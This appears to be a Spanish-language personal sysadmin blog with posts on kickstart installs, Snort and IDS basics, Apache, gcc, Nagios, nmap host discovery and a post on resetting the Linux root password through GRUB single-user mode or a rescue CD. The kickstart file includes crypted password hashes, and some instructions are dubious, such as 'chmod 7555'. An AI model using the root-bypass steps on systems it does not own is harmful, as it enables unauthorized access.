1.Se debe de contar con el servicio instalado por el cual se va a realizar la instalacion desatendida en este caso sera con NFS

2.Configurar las IP'S al que el servidor le va dar aceso para poder realizar la instalacion desatendida esto se realiza configurando los archivos host.allow y host.deny

3.En host.allow la configuracion es la siguiente:

portmap 127.0.0.1,ips's-que-permite-aceso -->> recordar que entre la parte de portmap y las ip's se separa por un tabulador.

4.En host .deny la configuracion es la siguiente:

portmap: ip's-que-no-se va permitir-acceso

portmap:ALL

5.Montar los cd's de linux RHE V4 en la carpeta en donde se desee

cp -R /media/cdrecorder/* /path-destino

6.Reiniciar el servicio nfs

7.Checar que se tenga bien configurado la red tanto (ip,netmask,gateaway,etc)

PARA GENERAR EL KICKSTAR

1.Realizar un archivo kickstar este lo ubicas en aplicaciones => herramientas del sistema => kickstar. Dentro de ese archivo tu ubicaras lo que vas a instalar en tu pc y sobre todo lo mas importante sobre que medio lo vas a instalar ,ya sea CDROM ,NFS,,WEB,FTP.

2.Dentro del kickstar se encuentra el metodo de instalacion , esta parte es importante que la configures bien por que es donde va buscar la maquina servidor en la red y por lo mismo los paquetes para la insta lacion.

3.Guardas el archivo ; por default se guarda como ks.cfg

4.Este archivo ks.cfg lo copias a un floopy

mcopy ks.cfg a:

Para generar el disco booteable

1.Debes copiar del disco 1 de la carpeta /isolinux todos los archivos a la carpeta /tmp/boot (creas un directorio boot )

2.Cambiar los permisos de todos los archivos de la carpeta de boot:

chmod 7555 /tmp/boot/*

3.Configuaras dentro de esa carpeta boot ,el archivo isolinux.cfg con los siguientes parametros

default ks

promt 0

label ks

kernel vmlinuz

append ks=cdrom initrd=initrd.img ramdisk_size=8192

Nota:este archivo contiene mas cosas borralas y solo deja estas lineas y lo guardas.

4.Ahora generas el iso de esta forma:

mkisofs -o /tmp/boot1.iso -b isolinux.bin -c boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -v -T /tmp/boot

INSTALACION EN MAQUINA CLIENTE

1.Enciendes La maquina e insertas tanto el cd booteable O el floopy (el floppy ya casi no se usa asi que sera por medio del cdrom )

2.empiezas a reconocer la red y te pide que configures la red de esa maquina.

NOTA:LACONFIGURACION QUE REALIZASTE EN LA MAQUINA SERVIDOR

3.luego corre el instalador de linux (anaconda) empieza a buscar la maquina servidor y posteriormente se empieza a generar la instalacion.

BUENO HAY LES VA OTRO TIP

Instalinux

Esta es una simple manera fácil de instalar Linux. sEguIMOS los pasos que el Sistema TE INDICA Elegir entre un montón de diferentes versiones y distribuciones de Linux, y software para elegir lo que desee incluir. El producto final será una bastante pequeña imagen ISO (30 MB o menos) que se pueden grabar en un CD y arrancar desde. Se construir automáticamente el sistema para que,BAJE lo que necesita desde el servidor Y SE réplica LOS PAQUETES QUE SE seleccionaRON, en tanto que NOS SENTAMOS A HECHAR LA CHELA..

PARA GENERAR EL DISCO DESDE LA IMAGEN QUE BAJAMOS

cdrecord -scanbus # tOMAMOS NOTA DEL DISPOSITIVO (3 DIGITOS)
cdrecord -dev -v img19271.iso (AQUI VAMOS A PONER EL NOMBRE DE LA IMAGEN QUE BAJAMOS)

BUENO AQUI ESTA LA LIGA:

http://www.instalinux.com/

CHIDOOOO..

aqui esta lo que en mi caso contiene el archivo kickstart

# ks.cfg : Created by Instalinux at Wed Jan 23 11:46:28 PST 2008
# COE-Profile used: Custom
lang en_US
keyboard la-latin1
install
timezone --utc UCT
rootpw --iscrypted gHaHSGFuHgvUg
network --bootproto dhcp --device eth0
url --url http://distro.ibiblio.org/pub/linux/distributions/fedora/linux/releases/7/Fedora/i386/os

%packages
@ Administration Tools
@ Legacy Software Development
@ Authoring and Publishing
@ Legacy Software Support
@ Base
@ Clustering
@ Core
@ Network Servers
@ DNS Name Server
@ Development Libraries
@ Development Tools
@ Dial-up Networking Support
@ Editors
@ Server Configuration Tools
@ System Tools
@ GNOME Desktop Environment
@ Text-based Internet
@ GNOME Software Development
@ Virtualization
@ Web Development
@ Graphical Internet
@ Web Server
@ Graphics
@ Window Managers
@ Java
@ Windows File Server
@ Java Development
@ X Software Development
@ KDE (K Desktop Environment)
@ X Window System
@ KDE Software Development
@ XFCE
@ Legacy Network Server
@ XFCE Software Development
%post

echo "Kickstart-installed Fedora 7 - Instalinux `/bin/date`" > /etc/motd
/usr/sbin/useradd -m -c "jonathan" -p ztzAiVjmnDGIQ ekxo

Compilar Snort INSTALACION

2008-01-10T21:43:00.000-08:00

Compilar Snort
Aconsejo leer los archivos README e INSTALL que vienen con el paquete, en ellos se explica detalladamente cualquier tipo de detalle para la compilacion y utilización del programa. Leed tambien el archivo README.database , pues en él se explica paso a paso lo que debemos hacer para configurar Snort contra cualquier base de datos (pgSQL, Oracle, MySQL, etc...).
Aconsejo leer el ./configure --help , en mi caso la compilación ha sido simple. Solamente para especificar la ubicación de la aplicación y dar soporte a la MySQL:
# tar zxvfp snort.tar.gz
# cd snort
# ./configure --prefix=/usr --with-mysql
# make
# make install
En este punto, si leiste la documentación oficial de Snort, veras que dice que (si queremos soporte para MySQL) tenemos que especificar el path hacia donde se encuentran sus librerias... (./configure --with-mysql=/path/to/libs) pero si lo hace así no creo que les funcione. Probramos sin especificar ningun path y seguramente compilara con éxito.
Ahora debe copiar ciertos archivos de configuración que vienen con el paquete, pero que la instalación no copia donde deben ir:
# cp snort.conf /etc/
# mkdir /etc/snort-rules
# cp *.rules /etc/snort-rules
El archivo snort.conf podemos imaginar para que sirve... y lso archivos loquesea.rules son archivos con especificaciones de reglas de Snort, según las cuales ha de logear los paquetes que crucen la red, dando un tipo de aviso en cada caso. Quisiera hacer referencia a la documentación relacionada con las reglas, el Snort Users Manual.
5. Configuración de la MySQL
Para que Snort deje sus logs en la base de datos, primero que crear una nueva base de datos con sus tablas correspondientes, asi como un usuario que SOLO tenga acceso a esa base de datos.
En el punto de los pre-requisitos hemos dejado la MySQL recien instalada y funcionando, ahora hay que añadirle usuarios. El usuario con mas permisos es el “root”, aunque es importante entender que los usuarios del sistema no son los mismos usuarios que los de la MySQL. De modo que desde la cuenta de cualquier usuario del sistema se puede acceder a cualquier cuenta de mysql.
Si tecleamos para empezar el siguiente comando, entraremos directamente en la MySQL con permisos de root (administrador):
# mysql -u root
Lo primero que debemos hacer es establecer una contraseña para el acceso del administrador:
mysql> GRANT ALL PRIVILEGES ON mysql.* TO root@localhost IDENTIFIED BY 'vuestro_password';
No es objetivo de este documento explicar la sintaxis y estructura de MySQL, de modo que me remitiré a puntualizar lo necesario para su utilización con Snort y ACID. De este modo, el siguiente paso es crear una base de datos para Snort:
mysql> CREATE DATABASE snort;
Una vez creada la base de datos de Snort, debemos crear un usuario con todos los permisos sobre esa base de datos, para no tener que utilizar el usuario “root”, ya que esto nos supondría un riesgo innecesario. Crearemos un usuario “snort” y le daremos permisos sobre su base de datos:
mysql> GRANT ALL PRIVILEGES ON snort.* TO snort@localhost IDENTIFIED BY 'password';
Creada la base de datos y creado el usuario, ya podemos salir de la MySQL y seguir con la configuración. Las tablas de la base de datos que acabamos de crear, serán las tablas que Snort necesite para dejar sus logs según la información contenida en cada tipo de log (más adelante lo configuraremos). Para crearlas debemos simplemente volcar el contenido de un fichero que ya contiene la estructura:
# mysql snort -u root -p < ./contrib/create_mysql ó
mysql -D snort -u root -p < ./schemas/create_mysql
Configuración de Snort
Debemos editar el archivo de configuración que hemos cpiado antes en /etc. Cuando editeis el /etc/snort.conf veras que está muy comentado, y antes de cada opción hay una explicación de varias lineas.
var HOME_NET 192.168.1.0/24
var HOME_NET $eth0_ADDRESS
var HOME_NET [192.168.1.0/24,192.168.10.0/24,172.26.0.0/24]
Primero definimos el rango de direcciones de nuestra red interna. Tenemos tres maneras de hacerlo... La primera define un rango de ip's, la segunda define el rango de ip's del cual forma parte la ip que tiene la tarjeta de red en el momento de lanzar Snort, y la tercera especifica varios rangos de ip's (si tenemos subredes, por ejemplo).
De este mismo modo definimos ciertas máquinas importantes de nuestra red:
var SMTP 192.168.1.10
var HTTP_SERVERS [192.168.1.10,192.168.1.20]
var SQL_SERVERS [192.168.1.10,192.168.1.20]
var LOCAL_HOSTS [192.168.1.1,192.168.1.100,192.168.1.110,192.168.1.254]
Y también definimos la red externa (Internet por ejemplo):
var EXTERNAL_NET any
A partir de aquí, debemos definir los preprocesadores. Esto es, plug-ins o partes del programa que definen una manera de esnifar los paquetes y detectar un mal funcionamiento o un tipo de ataque. Los preprocesadores estan sobradamente comentados y explicados antes de cada linea de código, por lo que no pienso explicar lo que hace cada uno, solo debemos leer su descripción y activarlo si lo queremos. Simplemente debemos saber que la manera de declarar cada preprocesador es la siguiente:
preprocessor nombre: argumento1,argumento2,argumento3,argumento4
Cabe destacar un preprocesador especial, SPADE (Statistical Package Anomaly Detection Engine), que estudia el tráfico en las máquinas que nosotros le especifiquemos, y a partir de ese estudio saca conclusiones de lo que es un paquete anómalo y lo que no lo es. Es decir, la probabilidad de que un paquete se dirija a la dirección IP 10.10.10.10, al puerto 8080, es de un 10%.... mientras que la probabilidad de que un paquete se dirija a esa misma IP al puerto 8079 es de un 0,1 %. El grado de anomalía de un paquete se mide según la siguiente fórmula:
A(X) = -Log2(P(X))
Por lo que el grado de anomalía de 10.10.10.10:8080 es de 3.32 (casi no es anómalo), mientras que para 10.10.10.10:8079 es de 9.97 (muy anómalo).
Para entender mejor el funcionamiento del SPADE, recomiendo leer el fichero README.Spade. La configuración de SPADE se realiza tambien en el fichero snort.conf, con el resto de los preprocesadores.
Por último, deberemos configurar los Output Plugins, que definen a donde tienen que ir a parar los logs que Snort genera. Deciden si van a ficheros de texto (logs) o a una base de datos, y decide tambien en que formato iran escritos (binario, texto plano, xml...). Como nos interesa poder acceder a los datos desde ACID y éste está escrito en PHP, diremos que guarde la salida en la base de datos MySQL:
output database: log, mysql, user=snort dbname=snort password=foo host=localhost
Aparte de eso, si queremos podemos especificar que tambien guarde los logs en otros formatos y/o localizaciones (syslog, por ejemplo). Leer la documentación escrita en el mismo snort.conf para decidir el formato y el lugar de almacenamiento de los logs.
Finalmente, podemos ponernos a escribir reglas de logging pero para eso recomiendo que leamos Snort Users Manual, pues lo explica MUY detenidamente y muy bien. Snort tiene ya diversos archivos con reglas escritas, que para empezar ya estan bien. Las añadir al final del snort.conf , y tener que especificarle la ruta... es decir, si las tienes en /etc/snort-rules (por ejemplo) pues deberas especificar esa ruta antes de cada fichero de reglas. Es MUY recomendable mirarse los ficheros de reglas antes de incluirlos, puesto que las reglas por defecto son muy restrictivas, y logean TODO (hasta los echo-request y echo-reply de los pings) por lo que si lo dejas tal cual, es posible que en una semana te hayas quedado sin un solo Mb libre en tu disco duro. Deberas leer los ficheros de reglas, y comentar aquellas reglas que creais mas restrictivas, o las que menos te preocupen... es decir, si sabeis que vuestro hermano (como ocurrió en mi caso) utiliza “Msn Messenger” puedes comentar la regla que lo logea en el archivo policy.rules, pues sabes de sobras que esos paquetes no son raros ni malos para vuestra red. Lo mismo con cada servicio que ofrezcas... simplemente deberas logear aquellos tipos de paquetes que concuerden con ataques, o intentos de intrusion (si miras los archivos de reglas en seguida veras a lo que me refiero), por ejemplo buffer overflows en los servicios, intentos de FTP como root, login erroneo por telnet, etc.... Quiza al principio se escape un poco de las manos, y veras que nuestro Snort tiene muchas reglas y no sabras diferenciar las que son buenas de las que son malas... no pasa nada. Simplemente deja que Snort logee, y a medida que vaya pasando el tiempo iras viendo cuales son las cosas que hacen que nuestra base de datos crezca de un modo exagerado, entonces vas a los archivos de reglas, y comenta la regla que logea eso que no quieres que logee.
Bien, pero... y eso de que logee??? pues bien, vamos a lanzar nuestro Snort!!! Obviamente lo primero que debeis hacer es lo siguiente:
# snort --help
Yo lo lanzo del siguiente modo:
# snort -dev -l /var/log/snort -h 192.168.1.0/24 -c /etc/snort.conf &
El argumento '-l' define el directorio donde se deben guardar los logs en formato de texto plano o binario. Para ello tendreis que haber configurado el tipo de salida correspondiente, aparte de la base de datos. Tambien puedes olvidar el archivo de los logs, no definir nada y simplemente logear en la MySQL, eso va segun los gustos de cada uno.

IDS y Snort

2008-01-10T21:42:00.000-08:00

Un IDS es una herramienta de seguridad que intenta detectar o monitorizar los eventos ocurridos en un determinado sistema informático en busca de intentos de comprometer la seguridad de dicho sistema.
Breve introducción a los sistemas IDS y Snort

Un IDS o Sistema de Detección de Intrusiones es una herramienta de seguridad que intenta detectar o monitorizar los eventos ocurridos en un determinado sistema informático o red informática en busca de intentos de comprometer la seguridad de dicho sistema.

• Los IDS buscan patrones previamente definidos que impliquen cualquier tipo de actividad sospechosa o maliciosa sobre nuestra red o host.

• Los IDS aportan a nuestra seguridad una capacidad de prevención y de alerta anticipada ante cualquier actividad sospechosa. No están diseñados para detener un ataque, aunque sí pueden generar ciertos tipos de respuesta ante éstos.

• Los IDS: aumentan la seguridad de nuestro sistema, vigilan el tráfico de nuestra red, examinan los paquetes analizándolos en busca de datos sospechosos y detectan las primeras fases de cualquier ataque como pueden ser el análisis de nuestra red, barrido de puertos, etc.

Tipos de IDS

1. HIDS (Host IDS)

Protege contra un único Servidor, PC o host. Monitorizan gran cantidad de eventos, analizando actividades con una gran precisión, determinando de esta manera qué procesos y usuarios se involucran en una determinada acción. Recaban información del sistema como ficheros, logs, recursos, etc, para su posterior análisis en busca de posibles incidencias. Todo ello en modo local, dentro del propio sistema. Fueron los primeros IDS en desarrollar por la industria de la seguridad informática.

2. NIDS (Net IDS)

Protege un sistema basado en red. Actúan sobre una red capturando y analizando paquetes de red, es decir, son sniffers del tráfico de red. Luego analizan los paquetes capturados, buscando patrones que supongan algún tipo de ataque.

Bien ubicados, pueden analizar grandes redes y su impacto en el tráfico suele ser pequeño. Actúan mediante la utilización de un dispositivo de red configurado en modo promiscuo (analizan, "ven" todos los paquetes que circulan por un segmento de red aunque estos nos vayan dirigidos a un determinado equipo). Analizan el trafico de red, normalmente, en tiempo real. No sólo trabajan a nivel TCP/IP, también lo pueden hacer a nivel de aplicación.

Otros tipos son los híbridos.
Por el tipo de respuesta podemos clasificarlos en:
Pasivos: Son aquellos IDS que notifican a la autoridad competente o administrador de la red mediante el sistema que sea, alerta, etc. Pero no actúa sobre el ataque o atacante.

Activos: Generan algún tipo de respuesta sobre el sistema atacante o fuente de ataque como cerrar la conexión o enviar algún tipo de respuesta predefinida en nuestra configuración.

Snort puede funcionar de las dos maneras.
Arquitectura de un IDS

Normalmente la arquitectura de un IDS, a grandes rasgos, está formada:
1. La fuente de recogida de datos. Estas fuentes pueden ser un log, dispositivo de red, o como en el caso de los IDS basados en host, el propio sistema.
2. Reglas que contienen los datos y patrones para detectar anomalías de seguridad en el sistema.
3. Filtros que comparan los datos snifados de la red o de logs con los patrones almacenados en las reglas.
4. Detectores de eventos anormales en el tráfico de red.
5. Dispositivo generador de informes y alarmas. En algunos casos con la sofisticación suficiente como para enviar alertas vía mail, o SMS.
Esto es a modo general. Cada IDS implementa la arquitectura de manera diferente.
Dónde colocar el IDS

Una actitud paranoica por nuestra parte nos podría llevar a instalar un IDS en cada host ó en cada tramo de red. Esto último sería un tanto lógico cuando se trata de grandes redes, no es nuestro caso ahora. Lo lógico sería instalar el IDS en un dispositivo por donde pase todo el tráfico de red que nos interese.
Dificultades

Un problema de los IDS es cuando queremos implementarlos en redes conmutadas ya que no hay segmento de red por donde pase todo el tráfico. Otro problema para un IDS son las redes con velocidades de tráfico muy altas en las cuales es difícil procesar todos los paquetes.

Posición del IDS

Si colocamos el IDS antes del cortafuegos capturaremos todo el tráfico de entrada y salida de nuestra red. La posibilidad de falsas alarmas es grande.

La colocación detrás del cortafuegos monitorizará todo el tráfico que no sea detectado y parado por el firewall o cortafuegos, por lo que será considerado como malicioso en un alto porcentaje de los casos. La posibilidad de falsas alarmas muy inferior.

Algunos administradores de sistemas colocan dos IDS, uno delante y otro detrás del cortafuegos para obtener información exacta de los tipos de ataques que recibe nuestra red ya que si el cortafuegos está bien configurado puede parar o filtras muchos ataques.

En ambientes domésticos, que es el propósito de este taller sobre IDS y Snort, podemos colocar el IDS en la misma máquina que el cortafuegos. En este caso actúan en paralelo, es decir, el firewall detecta los paquetes y el IDS los analizaría.

Introducción a Snort

Snort es un IDS o Sistema de detección de intrusiones basado en red (NIDS). Implementa un motor de detección de ataques y barrido de puertos que permite registrar, alertar y responder ante cualquier anomalía previamente definida como patrones que corresponden a ataques, barridos, intentos aprovechar alguna vulnerabilidad, análisis de protocolos, etc conocidos. Todo esto en tiempo real.

Snort (http://www.snort.org/) está disponible bajo licencia GPL, gratuito y funciona bajo plataformas Windows y UNIX/Linux. Es uno de los más usados y dispone de una gran cantidad de filtros o patrones ya predefinidos, así como actualizaciones constantes ante casos de ataques, barridos o vulnerabilidades que vayan siendo detectadas a través de los distintos boletines de seguridad.

Este IDS implementa un lenguaje de creación de reglas flexibles, potente y sencillo. Durante su instalación ya nos provee de cientos de filtros o reglas para backdoor, ddos, finger, ftp, ataques web, CGI, escaneos Nmap....

Puede funcionar como sniffer (podemos ver en consola y en tiempo real qué ocurre en nuestra red, todo nuestro tráfico), registro de paquetes (permite guardar en un archivo los logs para su posterior análisis, un análisis offline) o como un IDS normal (en este caso NIDS).

En este taller daremos una importancia mayor a su funcionamiento como NIDS y, sobre todo, a la creación personalizada de reglas e interpretación de las alertas.

La colocación de Snort en nuestra red puede realizarse según el tráfico quieren vigilar: paquetes que entran, paquetes salientes, dentro del firewall, fuera del firewall... y en realidad prácticamente donde queramos.

Una característica muy importante e implementada desde hace pocas versiones es FlexResp. Permite, dada una conexión que emita tráfico malicioso, darla de baja, hacerle un DROP mediante el envío de un paquete con el flag RST activa, con lo cual cumpliría funciones de firewall, cortando las conexiones que cumplan ciertas reglas predefinidas. No sólo corta la conexiones ya que puede realizar otras muchas acciones. Veremos más adelante su funcionamiento y ejemplos.

NOTA: Todos los ejemplos, mientras no se indique lo contrario, serán válidos para win32 y Linux/UNIX.

2008-01-09T08:33:00.000-08:00

Apache en FC8

Bueno empecemos con saber que es y para que sirve apache .pues Hypertext Transfer Protocol, o Protocolo de Trasferencia de Hipertext, es el método utilizado para transferir o transportar información en la Red Mundial (WWW, World Wide Web). Su propósito original fue el proveer una forma de publicar y recupertar documentos HTML.

HTTP es un protocolo de solicitud y respuesta a través de TCP, entre agentes de usuario (Navegadores, motores de índice y otras herramientas) y servidores, regularmente utilizando el puerto 80. Entre la comunicación entre éstos puede intervenir como servidores Intermediarios (Proxies), puertas de enlace y túneles. tmb podemos modificar a apache para que escuche en otro puerto por aquello de la seguridad.

Acerca de Apache.

http://www.apache.org/

Apache es un servidor HTTP, de código abierto y licenciamiento libre, que funciona en Linux, sistemas operativos derivados de Unix™, Windows, Novell Netware y otras plataformas. Ha desempeñado un papel muy importante en el crecimiento de la red mundial, y continua siendo el servidor HTTP más utilizado, siendo además el servidor de facto contra el cual se realizan las pruebas comparativas y de desempeño para otros productos competidores. Apache es desarrollado y mantenido por una comunidad de desarrolladores auspiciada por Apache Software Foundation.

la instalacion consta de varias partes pero tmb debemos tener en cuenta la vision de nuestro servicio a futuro. y saber que modulos vamos a necesitar

a traves de la herramienta de gestion de paquetes YUM para distros basados en rh

ekxo@victoria:~$yum -y install httpd php php-mysql mod_perl mod_python mod_ssl

si queremos que Apache incluya soporte para PHP/MySQL, Perl, Python y SSL/TLS

Iniciar servicio y añadir el servicio al arranque del sistema.

Apache es un servicio que por fortuna solo es necesario instalar e iniciar. No requiere modificaciones adicionales para su funcionamiento básico. Para añadir el servicio a los servicios que inician junto con el sistema, solo basta ejecutar:

ekxo@victoria:~$chkconfig httpd on .. aqui añadimos el servicio al arranque del sistema.

ekxo@victoria:~serrvice httpd start .. arracamos

ekxo@victoria:~$service httpd stop .. paramos

ekxo@victoria:~$service httpd reload .. recargamos el ficero de configuracion

SELinux y Apache.

Con núcleo 2.6 basada sobre Red Hat™ Enterprise Linux 4.0, como serían CentOS 4.0 o White Box Enterprise Linux 4.0 en adelante, éstas incluyen SELinux que añade seguridad adicional a Apache, sin embargo algunas opciones impedirán utilizar ciertas funciones en Apache, como directorios virtuales. Ejecute system-config-securitylevel desde el modo gráfico y active la casilla que dice «Disable SELinux Protection for httpd daemon» Si no tiene planeado utilizar directorios virtuales, puede dejar desactivada la casilla y aprovechar toda la seguridad adicional que brinda SELinux.

UTF-8

UTF-8 es un método de codificación de ASCII para Unicode (ISO-10646), el Conjunto de Caracteres Universal o UCS. éste codifica la mayoría de los sistemas de escritura del mundo en un solo conjunto de caracteres, permitiendo la mezcla de lenguajes y guiones en un mismo documento sin la necesidad de ajustes para realizar los cambios de conjuntos de caracteres.

Edite el fichero /etc/httpd/conf/httpd.conf y localice lo siguiente:

AddDefaultCharset UTF-8 si no quieres estre metodo de codificacion pon en ves de eso, esto AddDefaultCharset Off

Ficheros de configuración.

2008-01-08T17:19:00.000-08:00

Programacion en c

Qué es gcc?

El GNU cc (conocido como gcc) es el conjunto de compiladores que comprenden soporte para c,c++,o dirigido a objetos. Cabe mencionar que tambien compila FORTRAN fue creado por RICHARD STALLMAN EN EL 87 ha sido portado a mas arquitecturas que nigunno otro ya veran por que en fin ,se usa para desarrollar otros sistemas como BSDS o MAC OS X.

¿Cómo invocamos a gcc?

Para invocar a gcc, sólo tenemos que hacer desde la linea de comandos lo siguiente:

root@Byka:/home/ekxo# gcc nombre_de_código

Entonces, si en nuestro código gcc no detecta problemas, hará preprocesado, compilación, ensamblaje, y vinculación creando un archivo binario llamado a.out La manera más usual de invocar a gcc es la que nos permite nombrar a nuestro binario, así:

root@Byka:/home/ekxo#gcc nombre_de_código -o nombre_de_binario

Creando el archivo binario que fue especificado mediante el argumento -o, o sea nombre_de_binario

ejemplo

Los sistemas LINUX/UNIX son entornos de programación muy amigables, no es posible describir con exactitud porque, tal vez se deba al hecho de que estos sistemas están construidos con el lenguaje C (C fue diseñado para el sistema operativo UNIX). Bien, para escribir código C, basta con tomar nuestro editor de textos favorito (vi, ee, pico, etc.) crear el archivo y guardarlo con extensión c, como ejemplo:

*********************************************************************************

/*mensaje.c; programa que imprime un mensaje en pantalla*/
#include
int main()
{
printf("La sintaxis básica es:gcc nombre_de_código -o nombre_de_binario");
return 0;
}

**********************************************************************************
Guardamos este código con el nombre mensaje.c y compilamos >:-> :
root@Byka:/home/ekxo#gcc mensaje.c -o mensaje
Para Correr (o ejecutar) el programa, basta con hacer:
root@Byka:/home/ekxo#./mensaje

La compilación de un programa consiste en varias etapas, y que por lo general nosotros no observamos, pues gcc las lleva a cabo de manera encubierta, por decirlo de algún modo, así que veamos el proceso de compilación paso a paso, para ello nos auxiliaremos con el código de mensaje.c; básicamente lo que hace gcc es correr mensaje.c sobre el preprocesador , cpp, para expandir cualquier macro que pudiese haber e insertar también los contenidos de los archivos que incluimos mediante #include; la segunda etapa es compilar el código fuente prepocesado, para convertirlo en código objeto; por último y con ayuda de ld, llamado linker, crea el binario llamado mensaje.

Hagamos todo esto manualmente:

1.- para preprocesar mensaje.c:

root@Byka:/home/ekxo#gcc -E mensaje.c -o mensaje.cpp

2.- Hagamos la conversión de mensaje.cpp en código objeto.

root@Byka:/home/ekxo#gcc -x cpp-output -c mensaje.cpp -o mensaje.o

3.- Ahora creemos el binario

root@Byka:/home/ekxo#gcc mensaje.o -o mensaje

Lo anterior tiene utilidad si por ejemplo se presentan problemas entre algunos de los archivos incluidos mediante #include y nuestro código fuente, así mediante la compilación paso a paso es más fácil detectar que archivos son lo que producen conflicto. Para ilustrarlo, basta con que tomemos un editor de texto, y veamos el contenido del archivo mensaje.cpp. pero da hueva no!!! jaa

crack the root password

2008-01-07T07:51:00.000-08:00

Tocando el tema de la seguridad el desarrollo de linux ha estado evolucionando tmb dejando backdoors,de salidas alternas ,que en realidad son temas para los administradores de sistemas pero bueno aqui esta una de ellas.

METHOD 1
Here are the all steps to change password for root in linux:
1)when u reached at the grub screen press 'e' on linux
2)line which contains the word 'kernell' press 'e'
3)go to end of that line and write 'linux single'
4)the press 'esc' twice and press 'b' to reboot the system
5) now wait for the prompt u get, write easy command there:
passwd root

OR

METHOD 2
Please try out the following steps to change the root password:
1. Boot the computer with Linux Installation CD.
2. Enter into Linux Rescue mode by enering the following command in boot screen.
boot: linux rescue
3. When the sh prompt is reached, enter the following commands to change root password.
#chroot /mnt/sysimage
#passwd
The above steps will prompt you to enter your new password.

ekxo

Descubriendo con NMAP

2007-12-26T16:34:00.000-08:00

Bueno nmap es una herramienta de auditoria informatica asi como un arma de 2 filos jee en fin si queremos descubrir que hay en una red es decir que dispositovos existen prendido su ip,mac,so,puertos ,estado de ellos pues ahi les va

host discovery es un término que yo uso para describir una determinada fase de un test de intrusión, Donde se trata de determinar el acceso a las máquinas de una red. Muchas veces Si una de reglas de firewall está escrito explícitamente, es difícil determinar con exactitud ,Número de hosts que se encuentra detrás de un firewall. Un amigo mío emitieron recientemente uno con un escáner comercial en contra de una clase C y encontró sólo un huésped.

El uso de las técnicas descritas en este trabajo, he podido determinar que existe,No es sólo uno, sino diecisiete anfitriones en esta zona desmilitarizada.
este Escáner dispone de muy pocas opciones para el descubrimiento de acogida, y no es muy configurable ,Cuando se trata de ajustes para el método de descubrimiento.

Dado que este artículo trata de las nmap y descubrimiento le hable, específicamente, sobre Cómo nmap hace su descubrimiento, y aprenderemos a utilizar las opciones de nmap Mejorar la fase de descubrimiento de un test de intrusión o de la evaluación de la vulnerabilidad.

Hay tres fases distintas con el mando por encima de nmap. Ellos son:
1) Host descubrimiento
2) Puerto escaneado
3) OS fingerprinting

Dado que este estudio está centrado en el descubrimiento de host vamos a tomar una visión en mas profunda La primera fase de nmap, salvo los dos últimos.

Nota: Es posible deshabilitar el descubrimiento de la fase de exploración (con la P0 -
Opción), y decirle nmap pasar directamente a la fase de escaneo de puertos.

NAGIOS : SISTEMA DE MONITOREO PARA REDES

2007-12-26T15:57:00.000-08:00

Hola !!! PUES BUENO NO SOY BUENO ESCRIBIENDO BLOQ'S PERO ME LATE LA IDEA DE COMPARTIR LA INFORMACION Y CREAR COMUNIDADES DE CONOCIMIENTO DENTRO DE VARIOS AMBITOS EN FIN BUENO LES PLATICO
¿QUE ES NAGIOS?

NAGIOS ES UN SISTEMA DE MONITOREO DE DISPOSITIVOS DENTRO DE UNA RED Y NOS BRINDA LA FACILIDAD DE MONITOREAR HOST,SWITCHES,ROUTERS, ETC ... Y NO SOLO ESO SI NO TAMBIEN LSO SERVICIOS,PROCESOS,USUARIOS,TEMPERATURA ,FRECUENCIA DEL FAN Y OTROS DETALLES DEL DEVICE QUE VAYAMOS A MONITOREAR , ES UNA SERVICIO MUY IMPORTANTE SI NUESTRA CHAMBA ES SER UN TI Y ADMINISTRAR UNA NOC . ADEMAS ES OPENSOURCE CON LICENCIA GPL . BUENO VAYAMOS A LA INSTALACION. EN MI CASO SERA EN UN SERVIDOR HP CON UNA DISTRO FEDORA CORE 8. Linux desarrollo 2.6.23-1.3194.fc8 #1 SMP Wed May 23 22:35:01 EDT 2007 i686 i686 i386 GNU/Linux
concidero que ya tenemos apache,linux, etc..

Requisitos del sistema para Nagios

El único requisito de funcionamiento de Nagios es una máquina corriendo Linux (o variante de UNIX) y un COMPILADOR GCC . Probablemente desee tener TCP / IP configurado, ya que la mayoría de los controles de servicios SE Realizan a través de la red.

No está obligado a utilizar los CGIs incluido con Nagios. Sin embargo, si decidimos utilizarlos
tendrá que tener el siguiente software instalado.

Un servidor web (Apache preferentemente), Thomas Boutell gd biblioteca de la versión 1.6.3 o superior (obligatorio . Por el statusmap y tendencias CGIs)

[root@localhost downloads]# yum -y install gd gd-devel

[root@localhost downloads]# /usr/sbin/useradd nagios

[root@localhost downloads]# passwd nagios

[root@localhost downloads]# /usr/sbin/groupadd nagcmd

[root@localhost downloads]# /usr/sbin/usermod -G nagcmd nagios

[root@localhost downloads]# /usr/sbin/usermod -G nagcmd apache

[root@localhost downloads]# wget http://osdn.dl.sourceforge.net/sourceforge/nagios/nagios-3.0a4.tar.gz

[root@localhost downloads]# wget http://osdn.dl.sourceforge.net/sourceforge/nagiosplug/nagios-plugins-1.4.7.tar.gz

[root@localhost downloads]# tar xzf nagios-3.0a4.tar.gz

[root@localhost downloads]# cd nagios-3.0a4

[root@localhost nagios-3.0a4]# ./configure --with-command-group=nagcmd
Creating sample config files in sample-config/ ...

*** Configuration summary for nagios 3.0a4 05-08-2007 ***:

General Options:
-------------------------
Nagios executable: nagios
Nagios user/group: nagios,nagios
Command user/group: nagios,nagcmd
Embedded Perl: no
Event Broker: yes
Install ${prefix}: /usr/local/nagios
Lock file: ${prefix}/var/nagios.lock
Check result directory: ${prefix}/var/spool/checkresults
Init directory: /etc/rc.d/init.d
Apache conf.d directory: /etc/httpd/conf.d
Mail program: /bin/mail
Host OS: linux-gnu

Web Interface Options:
------------------------
HTML URL: http://localhost/nagios/
CGI URL: http://localhost/nagios/cgi-bin/
Traceroute (used by WAP): /bin/traceroute

Review the options above for accuracy. If they look okay,
type 'make all' to compile the main program and CGIs.
[root@localhost nagios-3.0a4]# make all
[root@localhost nagios-3.0a4]# make install
*** Main program, CGIs and HTML files installed ***

You can continue with installing Nagios as follows (type 'make'
without any arguments for a list of all possible options):

make install-init
- This installs the init script in /etc/rc.d/init.d

make install-commandmode
- This installs and configures permissions on the
directory for holding the external command file

make install-config
- This installs sample config files in /usr/local/nagios/etc

make[1]: se sale del directorio `/root/downloads/nagios-3.0a4'
[root@localhost nagios-3.0a4]# make install-init
/usr/bin/install -c -m 755 -d -o root -g root /etc/rc.d/init.d
/usr/bin/install -c -m 755 -o root -g root daemon-init /etc/rc.d/init.d/nagios

*** Init script installed ***

[root@localhost nagios-3.0a4]# make install-config
/usr/bin/install -c -m 775 -o nagios -g nagios -d /usr/local/nagios/etc
